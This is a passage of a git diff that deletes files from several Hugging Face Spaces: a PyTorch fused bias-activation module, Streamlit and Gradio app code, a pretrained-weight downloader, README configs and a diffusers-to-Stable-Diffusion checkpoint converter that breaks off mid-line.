def_gain=1, cuda_idx=6, ref='y', has_2nd_grad=True), - 'selu': dnnlib.EasyDict(func=lambda x, **_: torch.nn.functional.selu(x), def_alpha=0, def_gain=1, cuda_idx=7, ref='y', has_2nd_grad=True), - 'softplus': dnnlib.EasyDict(func=lambda x, **_: torch.nn.functional.softplus(x), def_alpha=0, def_gain=1, cuda_idx=8, ref='y', has_2nd_grad=True), - 'swish': dnnlib.EasyDict(func=lambda x, **_: torch.sigmoid(x) * x, def_alpha=0, def_gain=np.sqrt(2), cuda_idx=9, ref='x', has_2nd_grad=True), -} - -#---------------------------------------------------------------------------- - -_plugin = None -_null_tensor = torch.empty([0]) - -def _init(): - global _plugin - if _plugin is None: - _plugin = custom_ops.get_plugin( - module_name='bias_act_plugin', - sources=['bias_act.cpp', 'bias_act.cu'], - headers=['bias_act.h'], - source_dir=os.path.dirname(__file__), - extra_cuda_cflags=['--use_fast_math', '--allow-unsupported-compiler'], - ) - return True - -#---------------------------------------------------------------------------- - -def bias_act(x, b=None, dim=1, act='linear', alpha=None, gain=None, clamp=None, impl='cuda'): - r"""Fused bias and activation function. - - Adds bias `b` to activation tensor `x`, evaluates activation function `act`, - and scales the result by `gain`. Each of the steps is optional. In most cases, - the fused op is considerably more efficient than performing the same calculation - using standard PyTorch ops. It supports first and second order gradients, - but not third order gradients. - - Args: - x: Input activation tensor. Can be of any shape. - b: Bias vector, or `None` to disable. Must be a 1D tensor of the same type - as `x`. The shape must be known, and it must match the dimension of `x` - corresponding to `dim`. - dim: The dimension in `x` corresponding to the elements of `b`. - The value of `dim` is ignored if `b` is not specified. - act: Name of the activation function to evaluate, or `"linear"` to disable. - Can be e.g. `"relu"`, `"lrelu"`, `"tanh"`, `"sigmoid"`, `"swish"`, etc. - See `activation_funcs` for a full list. `None` is not allowed. - alpha: Shape parameter for the activation function, or `None` to use the default. - gain: Scaling factor for the output tensor, or `None` to use default. - See `activation_funcs` for the default scaling of each activation function. - If unsure, consider specifying 1. - clamp: Clamp the output values to `[-clamp, +clamp]`, or `None` to disable - the clamping (default). - impl: Name of the implementation to use. Can be `"ref"` or `"cuda"` (default). - - Returns: - Tensor of the same shape and datatype as `x`. - """ - assert isinstance(x, torch.Tensor) - assert impl in ['ref', 'cuda'] - if impl == 'cuda' and x.device.type == 'cuda' and _init(): - return _bias_act_cuda(dim=dim, act=act, alpha=alpha, gain=gain, clamp=clamp).apply(x, b) - return _bias_act_ref(x=x, b=b, dim=dim, act=act, alpha=alpha, gain=gain, clamp=clamp) - -#---------------------------------------------------------------------------- - -@misc.profiled_function -def _bias_act_ref(x, b=None, dim=1, act='linear', alpha=None, gain=None, clamp=None): - """Slow reference implementation of `bias_act()` using standard TensorFlow ops. - """ - assert isinstance(x, torch.Tensor) - assert clamp is None or clamp >= 0 - spec = activation_funcs[act] - alpha = float(alpha if alpha is not None else spec.def_alpha) - gain = float(gain if gain is not None else spec.def_gain) - clamp = float(clamp if clamp is not None else -1) - - # Add bias. - if b is not None: - assert isinstance(b, torch.Tensor) and b.ndim == 1 - assert 0 <= dim < x.ndim - assert b.shape[0] == x.shape[dim] - x = x + b.reshape([-1 if i == dim else 1 for i in range(x.ndim)]) - - # Evaluate activation function. - alpha = float(alpha) - x = spec.func(x, alpha=alpha) - - # Scale by gain. - gain = float(gain) - if gain != 1: - x = x * gain - - # Clamp. - if clamp >= 0: - x = x.clamp(-clamp, clamp) # pylint: disable=invalid-unary-operand-type - return x - -#---------------------------------------------------------------------------- - -_bias_act_cuda_cache = dict() - -def _bias_act_cuda(dim=1, act='linear', alpha=None, gain=None, clamp=None): - """Fast CUDA implementation of `bias_act()` using custom ops. - """ - # Parse arguments. - assert clamp is None or clamp >= 0 - spec = activation_funcs[act] - alpha = float(alpha if alpha is not None else spec.def_alpha) - gain = float(gain if gain is not None else spec.def_gain) - clamp = float(clamp if clamp is not None else -1) - - # Lookup from cache. - key = (dim, act, alpha, gain, clamp) - if key in _bias_act_cuda_cache: - return _bias_act_cuda_cache[key] - - # Forward op. - class BiasActCuda(torch.autograd.Function): - @staticmethod - def forward(ctx, x, b): # pylint: disable=arguments-differ - ctx.memory_format = torch.channels_last if x.ndim > 2 and x.stride(1) == 1 else torch.contiguous_format - x = x.contiguous(memory_format=ctx.memory_format) - b = b.contiguous() if b is not None else _null_tensor - y = x - if act != 'linear' or gain != 1 or clamp >= 0 or b is not _null_tensor: - y = _plugin.bias_act(x, b, _null_tensor, _null_tensor, _null_tensor, 0, dim, spec.cuda_idx, alpha, gain, clamp) - ctx.save_for_backward( - x if 'x' in spec.ref or spec.has_2nd_grad else _null_tensor, - b if 'x' in spec.ref or spec.has_2nd_grad else _null_tensor, - y if 'y' in spec.ref else _null_tensor) - return y - - @staticmethod - def backward(ctx, dy): # pylint: disable=arguments-differ - dy = dy.contiguous(memory_format=ctx.memory_format) - x, b, y = ctx.saved_tensors - dx = None - db = None - - if ctx.needs_input_grad[0] or ctx.needs_input_grad[1]: - dx = dy - if act != 'linear' or gain != 1 or clamp >= 0: - dx = BiasActCudaGrad.apply(dy, x, b, y) - - if ctx.needs_input_grad[1]: - db = dx.sum([i for i in range(dx.ndim) if i != dim]) - - return dx, db - - # Backward op. - class BiasActCudaGrad(torch.autograd.Function): - @staticmethod - def forward(ctx, dy, x, b, y): # pylint: disable=arguments-differ - ctx.memory_format = torch.channels_last if dy.ndim > 2 and dy.stride(1) == 1 else torch.contiguous_format - dx = _plugin.bias_act(dy, b, x, y, _null_tensor, 1, dim, spec.cuda_idx, alpha, gain, clamp) - ctx.save_for_backward( - dy if spec.has_2nd_grad else _null_tensor, - x, b, y) - return dx - - @staticmethod - def backward(ctx, d_dx): # pylint: disable=arguments-differ - d_dx = d_dx.contiguous(memory_format=ctx.memory_format) - dy, x, b, y = ctx.saved_tensors - d_dy = None - d_x = None - d_b = None - d_y = None - - if ctx.needs_input_grad[0]: - d_dy = BiasActCudaGrad.apply(d_dx, x, b, y) - - if spec.has_2nd_grad and (ctx.needs_input_grad[1] or ctx.needs_input_grad[2]): - d_x = _plugin.bias_act(d_dx, b, x, y, dy, 2, dim, spec.cuda_idx, alpha, gain, clamp) - - if spec.has_2nd_grad and ctx.needs_input_grad[2]: - d_b = d_x.sum([i for i in range(d_x.ndim) if i != dim]) - - return d_dy, d_x, d_b, d_y - - # Add to cache. - _bias_act_cuda_cache[key] = BiasActCuda - return BiasActCuda - -#---------------------------------------------------------------------------- diff --git a/spaces/ludvigolsen/plot_confusion_matrix/data.py b/spaces/ludvigolsen/plot_confusion_matrix/data.py deleted file mode 100644 index 00a380c51c1bb3dd1c8d66069d0a2e907cc32a32..0000000000000000000000000000000000000000 --- a/spaces/ludvigolsen/plot_confusion_matrix/data.py +++ /dev/null @@ -1,131 +0,0 @@ -import json -import pathlib -import pandas as pd -import streamlit as st -from utils import call_subprocess - -from components import add_toggle_vertical - - -def read_data(data): - if data is not None: - df = pd.read_csv(data) - return df - else: - return None - - -@st.cache_data -def read_data_cached(data): - return read_data(data) - - -def generate_data(out_path, num_classes, num_observations, seed) -> None: - call_subprocess( - f"Rscript generate_data.R --out_path {out_path} --num_classes {num_classes} --num_observations {num_observations} --seed {seed}", - message="Data generation script", - return_output=True, - encoding="UTF-8", - ) - - -class DownloadHeader: - """ - Class for showing header and download button (for an image file) in the same row. - """ - - @staticmethod - def slider_and_image_download( - filepath, - slider_label, - toggle_label, - download_label="Download", - slider_min=0.0, - slider_max=2.0, - slider_value=1.0, - slider_step=0.1, - slider_help=None, - toggle_value=False, - toggle_cols=[2, 5], - download_help="Download plot", - key=None, - ) -> int: - col1, col2, col3, col4 = st.columns([2, 6, 3, 3]) - with col2: - # Image viewing size slider - image_col_size = st.slider( - slider_label, - min_value=slider_min, - max_value=slider_max, - value=slider_value, - step=slider_step, - help=slider_help, - key=key + "_slider" if key is not None else key, - ) - with col3: - toggle_state = add_toggle_vertical( - label=toggle_label, - key=key + "_toggle" if key is not None else key, - default=toggle_value, - cols=toggle_cols, - ) - with col4: - st.write("") - with open(filepath, "rb") as img: - st.download_button( - label=download_label, - data=img, - file_name=pathlib.Path(filepath).name, - mime="image/png", - key=key + "_download" if key is not None else key, - help=download_help, - ) - return image_col_size, toggle_state - - @staticmethod - def _convert_df_to_csv(data, **kwargs): - return data.to_csv(**kwargs).encode("utf-8") - - @staticmethod - def header_and_data_download( - header, - data, - file_name, - col_sizes=[9, 2], - key=None, - label="Download", - help="Download data", - ): - col1, col2 = st.columns(col_sizes) - with col1: - st.subheader(header) - with col2: - st.write("") - st.download_button( - label=label, - data=DownloadHeader._convert_df_to_csv(data, index=False), - file_name=file_name, - key=key, - help=help, - ) - - @staticmethod - def centered_json_download( - data: dict, - file_name, - download_col_size=5, - key=None, - label="Download", - help="Download json file", - ): - col1, col2, col1 = st.columns([5, download_col_size, 5]) - with col2: - data_json = json.dumps(data) - st.download_button( - label=label, - data=data_json, - file_name=file_name, - key=key, - mime="application/json", - help=help, - ) diff --git a/spaces/lunarring/latentblending/README.md b/spaces/lunarring/latentblending/README.md deleted file mode 100644 index f54582befbfc4f8ad114d17d6c398c480670b15b..0000000000000000000000000000000000000000 --- a/spaces/lunarring/latentblending/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Latent Blending -emoji: 🫠 -colorFrom: green -colorTo: indigo -sdk: gradio -sdk_version: 3.19.1 -app_file: gradio_ui.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference \ No newline at end of file diff --git a/spaces/lwchen/CodeFormer/CodeFormer/scripts/download_pretrained_models_from_gdrive.py b/spaces/lwchen/CodeFormer/CodeFormer/scripts/download_pretrained_models_from_gdrive.py deleted file mode 100644 index 7df5be6fc260394ee9bbd0a7ae377e2ca657fe83..0000000000000000000000000000000000000000 --- a/spaces/lwchen/CodeFormer/CodeFormer/scripts/download_pretrained_models_from_gdrive.py +++ /dev/null @@ -1,60 +0,0 @@ -import argparse -import os -from os import path as osp - -# from basicsr.utils.download_util import download_file_from_google_drive -import gdown - - -def download_pretrained_models(method, file_ids): - save_path_root = f'./weights/{method}' - os.makedirs(save_path_root, exist_ok=True) - - for file_name, file_id in file_ids.items(): - file_url = 'https://drive.google.com/uc?id='+file_id - save_path = osp.abspath(osp.join(save_path_root, file_name)) - if osp.exists(save_path): - user_response = input(f'{file_name} already exist. Do you want to cover it? Y/N\n') - if user_response.lower() == 'y': - print(f'Covering {file_name} to {save_path}') - gdown.download(file_url, save_path, quiet=False) - # download_file_from_google_drive(file_id, save_path) - elif user_response.lower() == 'n': - print(f'Skipping {file_name}') - else: - raise ValueError('Wrong input. Only accepts Y/N.') - else: - print(f'Downloading {file_name} to {save_path}') - gdown.download(file_url, save_path, quiet=False) - # download_file_from_google_drive(file_id, save_path) - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - - parser.add_argument( - 'method', - type=str, - help=("Options: 'CodeFormer' 'facelib'. Set to 'all' to download all the models.")) - args = parser.parse_args() - - # file name: file id - # 'dlib': { - # 'mmod_human_face_detector-4cb19393.dat': '1qD-OqY8M6j4PWUP_FtqfwUPFPRMu6ubX', - # 'shape_predictor_5_face_landmarks-c4b1e980.dat': '1vF3WBUApw4662v9Pw6wke3uk1qxnmLdg', - # 'shape_predictor_68_face_landmarks-fbdc2cb8.dat': '1tJyIVdCHaU6IDMDx86BZCxLGZfsWB8yq' - # } - file_ids = { - 'CodeFormer': { - 'codeformer.pth': '1v_E_vZvP-dQPF55Kc5SRCjaKTQXDz-JB' - }, - 'facelib': { - 'yolov5l-face.pth': '131578zMA6B2x8VQHyHfa6GEPtulMCNzV', - 'parsing_parsenet.pth': '16pkohyZZ8ViHGBk3QtVqxLZKzdo466bK' - } - } - - if args.method == 'all': - for method in file_ids.keys(): - download_pretrained_models(method, file_ids[method]) - else: - download_pretrained_models(args.method, file_ids[args.method]) \ No newline at end of file diff --git a/spaces/lychees/Stable-Diffusion-ControlNet-WebUI/diffusion_webui/diffusion_models/__init__.py b/spaces/lychees/Stable-Diffusion-ControlNet-WebUI/diffusion_webui/diffusion_models/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/lykeven/CogVLM/style.css b/spaces/lykeven/CogVLM/style.css deleted file mode 100644 index 4693e18e14e99aa7194b4f81904c7ad23e661021..0000000000000000000000000000000000000000 --- a/spaces/lykeven/CogVLM/style.css +++ /dev/null @@ -1,7 +0,0 @@ -h1 { - text-align: center; - } - img#visitor-badge { - display: block; - margin: auto; - } \ No newline at end of file diff --git a/spaces/masakhane/dialogue-chat/app.py b/spaces/masakhane/dialogue-chat/app.py deleted file mode 100644 index 543d06fe01a490597fe8fbbf68e608f2156cebc2..0000000000000000000000000000000000000000 --- a/spaces/masakhane/dialogue-chat/app.py +++ /dev/null @@ -1,267 +0,0 @@ -from typing import Iterator -import gradio as gr -import torch -from model import get_input_token_length, run - -DEFAULT_SYSTEM_PROMPT = """\ -Wetin be your name ?\ -""" -MAX_MAX_NEW_TOKENS = 2048 -DEFAULT_MAX_NEW_TOKENS = 1024 -MAX_INPUT_TOKEN_LENGTH = 4000 - -DESCRIPTION = """ -# Masakhane Dialogue Models - -This Space demonstrates the dialogue models for Nigerian Pidgin, an African langage.\n - -🔎 For more about visit [our homepage](https://www.masakhane.io/). - -""" - - -if not torch.cuda.is_available(): - DESCRIPTION += '\n

    Running on CPU 🥶 This demo will be very slow on CPU.

    ' - - -def clear_and_save_textbox(message: str) -> tuple[str, str]: - return '', message - - -def display_input(message: str, - history: list[tuple[str, str]]) -> list[tuple[str, str]]: - history.append((message, '')) - return history - - -def delete_prev_fn( - history: list[tuple[str, str]]) -> tuple[list[tuple[str, str]], str]: - try: - message, _ = history.pop() - except IndexError: - message = '' - return history, message or '' - - -def generate( - message: str, - history_with_input: list[tuple[str, str]], - system_prompt: str, - max_new_tokens: int, - temperature: float, - top_p: float, - top_k: int, -) -> Iterator[list[tuple[str, str]]]: - if max_new_tokens > MAX_MAX_NEW_TOKENS: - raise ValueError - - history = history_with_input[:-1] - generator = run(message, history, system_prompt, max_new_tokens, temperature, top_p, top_k) - try: - first_response = next(generator) - yield history + [(message, first_response)] - except StopIteration: - yield history + [(message, '')] - for response in generator: - yield history + [(message, response)] - - -def process_example(message: str) -> tuple[str, list[tuple[str, str]]]: - generator = generate(message, [], DEFAULT_SYSTEM_PROMPT, 1024, 1, 0.95, 50) - for x in generator: - pass - return '', x - - -def check_input_token_length(message: str, chat_history: list[tuple[str, str]], system_prompt: str) -> None: - input_token_length = get_input_token_length(message, chat_history, system_prompt) - if input_token_length > MAX_INPUT_TOKEN_LENGTH: - raise gr.Error(f'The accumulated input is too long ({input_token_length} > {MAX_INPUT_TOKEN_LENGTH}). Clear your chat history and try again.') - - -with gr.Blocks(css='style.css') as demo: - gr.Markdown(DESCRIPTION) - #gr.DuplicateButton(value='Duplicate Space for private use', - # elem_id='duplicate-button') - - with gr.Group(): - chatbot = gr.Chatbot(label='Chatbot') - with gr.Row(): - textbox = gr.Textbox( - container=False, - show_label=False, - placeholder='Type a message...', - scale=10, - ) - submit_button = gr.Button('Submit', - variant='primary', - scale=1, - min_width=0) - with gr.Row(): - retry_button = gr.Button('🔄 Retry', variant='secondary') - undo_button = gr.Button('↩️ Undo', variant='secondary') - clear_button = gr.Button('🗑️ Clear', variant='secondary') - - saved_input = gr.State() - - with gr.Accordion(label='Advanced options', open=False): - system_prompt = gr.Textbox(label='System prompt', - value=DEFAULT_SYSTEM_PROMPT, - lines=6) - max_new_tokens = gr.Slider( - label='Max new tokens', - minimum=1, - maximum=MAX_MAX_NEW_TOKENS, - step=1, - value=DEFAULT_MAX_NEW_TOKENS, - ) - temperature = gr.Slider( - label='Temperature', - minimum=0.1, - maximum=4.0, - step=0.1, - value=1.0, - ) - top_p = gr.Slider( - label='Top-p (nucleus sampling)', - minimum=0.05, - maximum=1.0, - step=0.05, - value=0.95, - ) - top_k = gr.Slider( - label='Top-k', - minimum=1, - maximum=1000, - step=1, - value=50, - ) - - gr.Examples( - examples=[ - 'How I fit chop for here?', - 'I hear say restaurant dey here.', - 'Abeg you fit tell me which kind chop dey?', - 'I dey find restauarant.', - ], - inputs=textbox, - outputs=[textbox, chatbot], - fn=process_example, - cache_examples=False, - ) - - #gr.Markdown(LICENSE) - - textbox.submit( - fn=clear_and_save_textbox, - inputs=textbox, - outputs=[textbox, saved_input], - api_name=False, - queue=False, - ).then( - fn=display_input, - inputs=[saved_input, chatbot], - outputs=chatbot, - api_name=False, - queue=False, - ).then( - fn=check_input_token_length, - inputs=[saved_input, chatbot, system_prompt], - api_name=False, - queue=False, - ).success( - fn=generate, - inputs=[ - saved_input, - chatbot, - system_prompt, - max_new_tokens, - temperature, - top_p, - top_k, - ], - outputs=chatbot, - api_name=False, - ) - - button_event_preprocess = submit_button.click( - fn=clear_and_save_textbox, - inputs=textbox, - outputs=[textbox, saved_input], - api_name=False, - queue=False, - ).then( - fn=display_input, - inputs=[saved_input, chatbot], - outputs=chatbot, - api_name=False, - queue=False, - ).then( - fn=check_input_token_length, - inputs=[saved_input, chatbot, system_prompt], - api_name=False, - queue=False, - ).success( - fn=generate, - inputs=[ - saved_input, - chatbot, - system_prompt, - max_new_tokens, - temperature, - top_p, - top_k, - ], - outputs=chatbot, - api_name=False, - ) - - retry_button.click( - fn=delete_prev_fn, - inputs=chatbot, - outputs=[chatbot, saved_input], - api_name=False, - queue=False, - ).then( - fn=display_input, - inputs=[saved_input, chatbot], - outputs=chatbot, - api_name=False, - queue=False, - ).then( - fn=generate, - inputs=[ - saved_input, - chatbot, - system_prompt, - max_new_tokens, - temperature, - top_p, - top_k, - ], - outputs=chatbot, - api_name=False, - ) - - undo_button.click( - fn=delete_prev_fn, - inputs=chatbot, - outputs=[chatbot, saved_input], - api_name=False, - queue=False, - ).then( - fn=lambda x: x, - inputs=[saved_input], - outputs=textbox, - api_name=False, - queue=False, - ) - - clear_button.click( - fn=lambda: ([], ''), - outputs=[chatbot, saved_input], - queue=False, - api_name=False, - ) - -demo.queue(max_size=20).launch() diff --git a/spaces/matthoffner/chatbot-mini/utils/data/throttle.ts b/spaces/matthoffner/chatbot-mini/utils/data/throttle.ts deleted file mode 100644 index 1a1e3e5e3d74a4d22a3a6c1a3648ae5116ccd4f3..0000000000000000000000000000000000000000 --- a/spaces/matthoffner/chatbot-mini/utils/data/throttle.ts +++ /dev/null @@ -1,22 +0,0 @@ -export function throttle any>( - func: T, - limit: number, -): T { - let lastFunc: ReturnType; - let lastRan: number; - - return ((...args) => { - if (!lastRan) { - func(...args); - lastRan = Date.now(); - } else { - clearTimeout(lastFunc); - lastFunc = setTimeout(() => { - if (Date.now() - lastRan >= limit) { - func(...args); - lastRan = Date.now(); - } - }, limit - (Date.now() - lastRan)); - } - }) as T; -} diff --git a/spaces/matthoffner/falcon-40b-instruct-ggml/README.md b/spaces/matthoffner/falcon-40b-instruct-ggml/README.md deleted file mode 100644 index 5e4d681c7bef4a754722bd7bbfcfac4be2675bb7..0000000000000000000000000000000000000000 --- a/spaces/matthoffner/falcon-40b-instruct-ggml/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: falcon-40b-ggml-cuda -emoji: 🦅 -colorFrom: red -colorTo: blue -sdk: docker -pinned: false -app_port: 7860 ---- - -# falcon-40b-ggml-cuda - -## ggllm.cpp -## ctransformers diff --git a/spaces/mattricesound/RemFx/scripts/test.py b/spaces/mattricesound/RemFx/scripts/test.py deleted file mode 100644 index e63e282ea397bbf4161567ae43775eb7696e2329..0000000000000000000000000000000000000000 --- a/spaces/mattricesound/RemFx/scripts/test.py +++ /dev/null @@ -1,51 +0,0 @@ -import pytorch_lightning as pl -import hydra -from omegaconf import DictConfig -import remfx.utils as utils -import torch - -log = utils.get_logger(__name__) - - -@hydra.main(version_base=None, config_path="../cfg", config_name="config.yaml") -def main(cfg: DictConfig): - # Apply seed for reproducibility - if cfg.seed: - pl.seed_everything(cfg.seed) - log.info(f"Instantiating datamodule <{cfg.datamodule._target_}>.") - datamodule = hydra.utils.instantiate(cfg.datamodule, _convert_="partial") - log.info(f"Instantiating model <{cfg.model._target_}>.") - model = hydra.utils.instantiate(cfg.model, _convert_="partial") - device = torch.device("cuda" if torch.cuda.is_available() else "cpu") - state_dict = torch.load(cfg.ckpt_path, map_location=device)[ - "state_dict" - ] - model.load_state_dict(state_dict) - - # Init all callbacks - callbacks = [] - if "callbacks" in cfg: - for _, cb_conf in cfg["callbacks"].items(): - if "_target_" in cb_conf: - log.info(f"Instantiating callback <{cb_conf._target_}>.") - callbacks.append(hydra.utils.instantiate(cb_conf, _convert_="partial")) - - logger = hydra.utils.instantiate(cfg.logger, _convert_="partial") - log.info(f"Instantiating trainer <{cfg.trainer._target_}>.") - trainer = hydra.utils.instantiate( - cfg.trainer, callbacks=callbacks, logger=logger, _convert_="partial" - ) - log.info("Logging hyperparameters!") - utils.log_hyperparameters( - config=cfg, - model=model, - datamodule=datamodule, - trainer=trainer, - callbacks=callbacks, - logger=logger, - ) - trainer.test(model=model, datamodule=datamodule) - - -if __name__ == "__main__": - main() diff --git a/spaces/medici/dreambooth-training/convertosd.py b/spaces/medici/dreambooth-training/convertosd.py deleted file mode 100644 index 1211d34edf018b7c402a765c5a7ecdb684cc28e3..0000000000000000000000000000000000000000 --- a/spaces/medici/dreambooth-training/convertosd.py +++ /dev/null @@ -1,302 +0,0 @@ -# Script for converting a HF Diffusers saved pipeline to a Stable Diffusion checkpoint. -# *Only* converts the UNet, VAE, and Text Encoder. -# Does not convert optimizer state or any other thing. - -import argparse -import os.path as osp -import re - -import torch -import gc - -# =================# -# UNet Conversion # -# =================# - -unet_conversion_map = [ - # (stable-diffusion, HF Diffusers) - ("time_embed.0.weight", "time_embedding.linear_1.weight"), - ("time_embed.0.bias", "time_embedding.linear_1.bias"), - ("time_embed.2.weight", "time_embedding.linear_2.weight"), - ("time_embed.2.bias", "time_embedding.linear_2.bias"), - ("input_blocks.0.0.weight", "conv_in.weight"), - ("input_blocks.0.0.bias", "conv_in.bias"), - ("out.0.weight", "conv_norm_out.weight"), - ("out.0.bias", "conv_norm_out.bias"), - ("out.2.weight", "conv_out.weight"), - ("out.2.bias", "conv_out.bias"), -] - -unet_conversion_map_resnet = [ - # (stable-diffusion, HF Diffusers) - ("in_layers.0", "norm1"), - ("in_layers.2", "conv1"), - ("out_layers.0", "norm2"), - ("out_layers.3", "conv2"), - ("emb_layers.1", "time_emb_proj"), - ("skip_connection", "conv_shortcut"), -] - -unet_conversion_map_layer = [] -# hardcoded number of downblocks and resnets/attentions... -# would need smarter logic for other networks. -for i in range(4): - # loop over downblocks/upblocks - - for j in range(2): - # loop over resnets/attentions for downblocks - hf_down_res_prefix = f"down_blocks.{i}.resnets.{j}." - sd_down_res_prefix = f"input_blocks.{3*i + j + 1}.0." - unet_conversion_map_layer.append((sd_down_res_prefix, hf_down_res_prefix)) - - if i < 3: - # no attention layers in down_blocks.3 - hf_down_atn_prefix = f"down_blocks.{i}.attentions.{j}." - sd_down_atn_prefix = f"input_blocks.{3*i + j + 1}.1." - unet_conversion_map_layer.append((sd_down_atn_prefix, hf_down_atn_prefix)) - - for j in range(3): - # loop over resnets/attentions for upblocks - hf_up_res_prefix = f"up_blocks.{i}.resnets.{j}." - sd_up_res_prefix = f"output_blocks.{3*i + j}.0." - unet_conversion_map_layer.append((sd_up_res_prefix, hf_up_res_prefix)) - - if i > 0: - # no attention layers in up_blocks.0 - hf_up_atn_prefix = f"up_blocks.{i}.attentions.{j}." - sd_up_atn_prefix = f"output_blocks.{3*i + j}.1." - unet_conversion_map_layer.append((sd_up_atn_prefix, hf_up_atn_prefix)) - - if i < 3: - # no downsample in down_blocks.3 - hf_downsample_prefix = f"down_blocks.{i}.downsamplers.0.conv." - sd_downsample_prefix = f"input_blocks.{3*(i+1)}.0.op." - unet_conversion_map_layer.append((sd_downsample_prefix, hf_downsample_prefix)) - - # no upsample in up_blocks.3 - hf_upsample_prefix = f"up_blocks.{i}.upsamplers.0." - sd_upsample_prefix = f"output_blocks.{3*i + 2}.{1 if i == 0 else 2}." - unet_conversion_map_layer.append((sd_upsample_prefix, hf_upsample_prefix)) - -hf_mid_atn_prefix = "mid_block.attentions.0." -sd_mid_atn_prefix = "middle_block.1." -unet_conversion_map_layer.append((sd_mid_atn_prefix, hf_mid_atn_prefix)) - -for j in range(2): - hf_mid_res_prefix = f"mid_block.resnets.{j}." - sd_mid_res_prefix = f"middle_block.{2*j}." - unet_conversion_map_layer.append((sd_mid_res_prefix, hf_mid_res_prefix)) - - -def convert_unet_state_dict(unet_state_dict): - # buyer beware: this is a *brittle* function, - # and correct output requires that all of these pieces interact in - # the exact order in which I have arranged them. - mapping = {k: k for k in unet_state_dict.keys()} - for sd_name, hf_name in unet_conversion_map: - mapping[hf_name] = sd_name - for k, v in mapping.items(): - if "resnets" in k: - for sd_part, hf_part in unet_conversion_map_resnet: - v = v.replace(hf_part, sd_part) - mapping[k] = v - for k, v in mapping.items(): - for sd_part, hf_part in unet_conversion_map_layer: - v = v.replace(hf_part, sd_part) - mapping[k] = v - new_state_dict = {v: unet_state_dict[k] for k, v in mapping.items()} - return new_state_dict - - -# ================# -# VAE Conversion # -# ================# - -vae_conversion_map = [ - # (stable-diffusion, HF Diffusers) - ("nin_shortcut", "conv_shortcut"), - ("norm_out", "conv_norm_out"), - ("mid.attn_1.", "mid_block.attentions.0."), -] - -for i in range(4): - # down_blocks have two resnets - for j in range(2): - hf_down_prefix = f"encoder.down_blocks.{i}.resnets.{j}." - sd_down_prefix = f"encoder.down.{i}.block.{j}." - vae_conversion_map.append((sd_down_prefix, hf_down_prefix)) - - if i < 3: - hf_downsample_prefix = f"down_blocks.{i}.downsamplers.0." - sd_downsample_prefix = f"down.{i}.downsample." - vae_conversion_map.append((sd_downsample_prefix, hf_downsample_prefix)) - - hf_upsample_prefix = f"up_blocks.{i}.upsamplers.0." - sd_upsample_prefix = f"up.{3-i}.upsample." - vae_conversion_map.append((sd_upsample_prefix, hf_upsample_prefix)) - - # up_blocks have three resnets - # also, up blocks in hf are numbered in reverse from sd - for j in range(3): - hf_up_prefix = f"decoder.up_blocks.{i}.resnets.{j}." - sd_up_prefix = f"decoder.up.{3-i}.block.{j}." - vae_conversion_map.append((sd_up_prefix, hf_up_prefix)) - -# this part accounts for mid blocks in both the encoder and the decoder -for i in range(2): - hf_mid_res_prefix = f"mid_block.resnets.{i}." - sd_mid_res_prefix = f"mid.block_{i+1}." - vae_conversion_map.append((sd_mid_res_prefix, hf_mid_res_prefix)) - - -vae_conversion_map_attn = [ - # (stable-diffusion, HF Diffusers) - ("norm.", "group_norm."), - ("q.", "query."), - ("k.", "key."), - ("v.", "value."), - ("proj_out.", "proj_attn."), -] - - -def reshape_weight_for_sd(w): - # convert HF linear weights to SD conv2d weights - return w.reshape(*w.shape, 1, 1) - - -def convert_vae_state_dict(vae_state_dict): - mapping = {k: k for k in vae_state_dict.keys()} - for k, v in mapping.items(): - for sd_part, hf_part in vae_conversion_map: - v = v.replace(hf_part, sd_part) - mapping[k] = v - for k, v in mapping.items(): - if "attentions" in k: - for sd_part, hf_part in vae_conversion_map_attn: - v = v.replace(hf_part, sd_part) - mapping[k] = v - new_state_dict = {v: vae_state_dict[k] for k, v in mapping.items()} - weights_to_convert = ["q", "k", "v", "proj_out"] - print("Converting to CKPT ...") - for k, v in new_state_dict.items(): - for weight_name in weights_to_convert: - if f"mid.attn_1.{weight_name}.weight" in k: - print(f"Reshaping {k} for SD format") - new_state_dict[k] = reshape_weight_for_sd(v) - return new_state_dict - - -# =========================# -# Text Encoder Conversion # -# =========================# - - -textenc_conversion_lst = [ - # (stable-diffusion, HF Diffusers) - ("resblocks.", "text_model.encoder.layers."), - ("ln_1", "layer_norm1"), - ("ln_2", "layer_norm2"), - (".c_fc.", ".fc1."), - (".c_proj.", ".fc2."), - (".attn", ".self_attn"), - ("ln_final.", "transformer.text_model.final_layer_norm."), - ("token_embedding.weight", "transformer.text_model.embeddings.token_embedding.weight"), - ("positional_embedding", "transformer.text_model.embeddings.position_embedding.weight"), -] -protected = {re.escape(x[1]): x[0] for x in textenc_conversion_lst} -textenc_pattern = re.compile("|".join(protected.keys())) - -# Ordering is from https://github.com/pytorch/pytorch/blob/master/test/cpp/api/modules.cpp -code2idx = {"q": 0, "k": 1, "v": 2} - - -def convert_text_enc_state_dict_v20(text_enc_dict): - new_state_dict = {} - capture_qkv_weight = {} - capture_qkv_bias = {} - for k, v in text_enc_dict.items(): - if ( - k.endswith(".self_attn.q_proj.weight") - or k.endswith(".self_attn.k_proj.weight") - or k.endswith(".self_attn.v_proj.weight") - ): - k_pre = k[: -len(".q_proj.weight")] - k_code = k[-len("q_proj.weight")] - if k_pre not in capture_qkv_weight: - capture_qkv_weight[k_pre] = [None, None, None] - capture_qkv_weight[k_pre][code2idx[k_code]] = v - continue - - if ( - k.endswith(".self_attn.q_proj.bias") - or k.endswith(".self_attn.k_proj.bias") - or k.endswith(".self_attn.v_proj.bias") - ): - k_pre = k[: -len(".q_proj.bias")] - k_code = k[-len("q_proj.bias")] - if k_pre not in capture_qkv_bias: - capture_qkv_bias[k_pre] = [None, None, None] - capture_qkv_bias[k_pre][code2idx[k_code]] = v - continue - - relabelled_key = textenc_pattern.sub(lambda m: protected[re.escape(m.group(0))], k) - new_state_dict[relabelled_key] = v - - for k_pre, tensors in capture_qkv_weight.items(): - if None in tensors: - raise Exception("CORRUPTED MODEL: one of the q-k-v values for the text encoder was missing") - relabelled_key = textenc_pattern.sub(lambda m: protected[re.escape(m.group(0))], k_pre) - new_state_dict[relabelled_key + ".in_proj_weight"] = 